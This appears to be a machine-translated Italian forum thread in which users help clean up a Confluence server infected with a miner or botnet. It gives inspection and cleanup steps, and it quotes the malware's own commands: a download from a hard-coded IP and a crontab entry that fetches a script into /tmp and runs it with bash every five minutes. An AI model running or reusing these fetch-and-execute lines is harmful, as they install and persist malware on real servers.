Il tuo server sembra violato. Dai un'occhiata all'elenco dei processi da vicino. eseguire ps auxc e dai un'occhiata alle origini binarie di processo.
Puoi usare strumenti come rkhunter per scansionare il tuo server ma in generale dovresti all'inizio uccidere tutto ciò che è stato pranzato come utente di confluenza, scansionare il tuo server/account, aggiornare la tua confluenza (nella maggior parte dei casi fonte di attacco determinata dall'utente) e guardare nella tua confluenza per account aggiuntivi ecc.
Ti piacerebbe vedere cosa c'è in quel processo, dai un'occhiata a /proc ad es. in ls -la /proc/996 . Vedrai il binario sorgente anche lì. Puoi anche pranzare strace -ff -p 996 per vedere cosa sta facendo il processo o cat /proc/996/exe | strings per vedere quali stringhe hanno quel binario. Questa è probabilmente una specie di parte di botnet, minatore ecc.
Ho avuto lo stesso problema, è stato violato, lo script del virus era in /tmp, trova il nome dello script dal comando "top" (lettere insignificanti , il nome di "fcbk6hj" era mio.) e uccidi i processi (forse 3 processi)
radice 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
uccidili tutti ed elimina /tmp/prot, e interrompi il processo di /boot/vmlinuz, la CPU è tornata.
Ho scoperto che il virus aveva scaricato automaticamente lo script in /tmp, il mio metodo era mv wgetak con un altro nome.
Virus comportamentale:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
trovato che la seguente attività è stata scritta in crontab, basta eliminarla:*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame
Dopo averlo rimosso dal sistema e dal crontab, forse è una buona idea (almeno per ora) aggiungere l'utente di confluence a /etc/cron.deny .
E dopo:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information